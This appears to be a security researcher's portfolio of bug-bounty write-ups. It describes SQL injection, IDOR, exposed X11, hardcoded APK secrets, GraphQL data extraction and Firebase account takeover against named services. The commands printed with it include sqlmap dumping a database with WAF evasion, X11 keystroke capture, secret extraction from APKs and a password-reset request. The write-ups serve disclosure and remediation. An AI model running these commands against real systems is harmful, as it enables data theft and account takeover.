Every vulnerability tells a story.
Detailed technical write-ups of discovered vulnerabilities
Discovery: A time-based blind SQL injection was discovered in the product search functionality. The vulnerability allowed extraction of the entire database, including customer information, credit card numbers, addresses, and password hashes.
Exploitation: Using sqlmap with custom tamper scripts, I was able to bypass WAF protections and extract database contents. Password hashes were cracked using HashCat and John the Ripper, revealing weak password practices.
Impact: Complete compromise of customer data, including personally identifiable information (PII) and financial data.
Remediation: Implemented parameterized queries, WAF rules to block SQL injection patterns, and enforced strong password policies.
# SQLMap command used
sqlmap -u "https://www.oh-the-horror.com/[REDACTED]" \
--risk=3 --level=5 \
--tamper=space2comment \
--dbms=mysql \
--dump-all
Discovery: The product page used a sequential numeric parameter to identify products. By simply changing the ID parameter, I could access any product in the database.
Exploitation: Modifying the URL parameter from
PiD=A15 to PiD=C1 revealed
a discontinued product priced at $5 instead of the current $150.
Impact: Users could purchase products at significantly reduced prices, leading to financial loss and inventory manipulation.
Remediation: Implemented UUID-based product identifiers, added server-side authorization checks, and enforced strict access controls.
# Before: Access restricted products by ID
GET /product.php?PiD=A15 HTTP/1.1
Host: www.[REDACTED].com
# After: IDOR exploitation
GET /product.php?PiD=C1 HTTP/1.1
Host: www.[REDACTED].com
# Response showcased a new product with price $5 instead of $150
Discovery: A misconfigured X11 server was exposed on port 6001, allowing unauthorized remote access to the display server.
Exploitation: Using standard X11 tools, I was able to capture screenshots, monitor keystrokes, and intercept clipboard contents of the active session.
Impact: Complete visibility into the victim's session, including sensitive operations, credentials, and proprietary information.
Remediation: Disabled X11 forwarding, implemented proper access controls, and restricted port exposure to internal networks only.
# Port scan
nmap -p 6001 -sV [REDACTED_IP]
# Capture screenshot
xwd -root -display :1 -out screenshot.xwd [REDACTED_IP]:6001
# Display screenshot
xwud -in screenshot.xwd
# Monitor keystrokes (requires x11vnc)
x11vnc -display :1 -forever -nopw [REDACTED_IP]:6001
Discovery: During static analysis of the Android APK, a hardcoded API key was discovered in the application's resources.
Exploitation: The API key was publicly accessible and could be extracted by decompiling the APK. The key provided access to production API endpoints.
Impact: Unauthorized access to API endpoints, potential data exposure, and abuse of the API functionality.
Remediation: API keys were rotated, implemented proper secret management using environment variables, and enforced API key restrictions to specific IPs/services.
# Decompile APK
apktool d base.apk
# Search for API key
grep -r "api_key" base/
# Extract key from strings
strings base.apk | grep -i "key"
# Test API access
curl -X GET https://[REDACTED_SUB_IDENTIFIER].cashapp.com/[REDACTED_END_POINT] \
-H "Authorization: Bearer API_KEY_FOUND"
Discovery: Static analysis of the Grab APK revealed over 10,000 exposed data collection and harvesting endpoints.
Exploitation: The endpoints were collecting user data without proper consent or privacy controls. Data included location, device information, and user behavior patterns.
Impact: Mass data harvesting, privacy violations, and potential GDPR/CCPA non-compliance.
Remediation: Implemented proper data collection policies, added user consent mechanisms, and reduced endpoint exposure.
# Extract endpoints from APK
apktool d base.apk
# Found File;
/assets/[REDACTED_NAME]_config.bin
# Found Encrypted String:
eJzkvWtz20iyIPpX6syHnrMxNk63u6fnjL6R1LMtSmyRttq9u+EoAEWyRAAFowBS0Dn73zezCgBZIMxK2XMjNuJGtyUqC0jWM1+Vj//6yyjPb6Uu/3LG/usvi4JvRQIQbf6MVJVhw09v2F/KdSH0WiVx83di3/mf//WXnEcbvhLwB7yQBmFSiZQXG1EGmi+5LP4CT2c8NQ9cJvW8A+6EXK0N/v/zhh3h2RahCngWF0rGhy....[REDACTED_STRING]
# Python Script to Decode String:
--------------------------------------------------------------------------------
import base64
import zlib
import json
# 1. Read the raw token from file
with open("token.txt", "r") as f:
token = f.read().strip()
# 2. Decode & decompress
decoded = base64.b64decode(token)
decompressed = zlib.decompress(decoded)
# 3. Parse as JSON
data = json.loads(decompressed)
# 4. Save pretty output to a file
with open("output.json", "w") as out:
json.dump(data, out, indent=2)
# 5. Optional: print a success message and a tiny preview
print(" Decompression complete! Saved to output.json")
print(f" Preview (first 200 chars): {str(data)[:200]}...")
--------------------------------------------------------------------------------
# Read JSON Output File:
Here are the categories of the decoded configuration file;
{
"AppList": {
"TravelApps": {
"count": 1,
"threshold": 1,
"list": [
"msName": "IsSingle"
},
"WomenApps": {
"count": 1,
"threshold": 1,
"list": [
"msName": "UserGenderWomen"
},
"MenApps": {
"count": 1,
"threshold": 1,
"list": [
"msName": "UserGenderMen"
},
"MicroMobilityApps": {
"count": 1,
"threshold": 1,
"list": [
"msName": "IsMicroMobility"
},
"RideShareApps": {
"count": 1,
"threshold": 1,
"list": [
"msName": "IsRideShare"
},
"TechSavyApps": {
"count": 1,
"threshold": 1,
"list": [
"msName": "IsTechie"
},
"InvestmentsApps": {
"count": 1,
"threshold": 1,
"list": [
[REDACTED_REST]
done
Discovery: The PlayStation GraphQL API exposed 28 massive operations that could be exploited for data extraction.
Exploitation: Using GraphQL introspection and custom queries, I was able to extract user data, purchase history, and account information.
Impact: Exposure of user account data, financial information, and potential account takeover.
Remediation: Implemented rate limiting, disabled introspection in production, and enforced proper authorization checks.
# GraphQL Introspection Query
query {
__schema {
types {
name
fields {
name
type {
name
}
}
}
}
}
# Data extraction query
query {
user(id: "target_id") {
email
purchases {
itemId
price
date
}
accountInfo {
balance
status
}
}
}
Discovery: Multiple vulnerabilities including hardcoded Firebase API keys and OAuth client secrets exposed in APK files.
Exploitation (Grab): Extracted SHA1 signing key from APK, manipulated Firebase configurations, and achieved full account takeover by resetting passwords.
Exploitation (Snapchat): Hardcoded Amazon OAuth client secret in APK allowed account takeover if attacker had network access to the victim's device.
Impact: Full account takeover, data manipulation, and unauthorized access to user accounts.
Remediation: Rotated all secrets, implemented proper secret management, and enforced certificate pinning.
# Extract Firebase API key
strings target.apk | grep -i "firebase"
# Firebase password reset
curl -X POST https://identitytoolkit.googleapis.com/v1/accounts:changePassword?key=[REDACTED_KEY] \
-H "Content-Type: application/json" \
-d '{"requestType":"new_password":"[REDACTED_PASSWORD],"email":"[REDACTED_EMAIL]","apiKey":"REDACTED_FIREBASE_API_KEY","client_secret":"[REDACTED_SECRET]"}'
# OAuth client secret extraction
jadx -d output target.apk
grep -r "client_secret" output/
Overview of bug bounty performance
The approach behind every discovery
Extensive enumeration of attack surfaces, API endpoints, and subdomains.
Decompilation of APKs, analysis of source code, and identification of hardcoded secrets.
Live testing using Burp Suite, custom scripts, and exploitation techniques.
Detailed reporting, remediation guidance, and coordinated disclosure.
I can find vulnerabilities in your systems too. Let's talk about how I can help secure your infrastructure.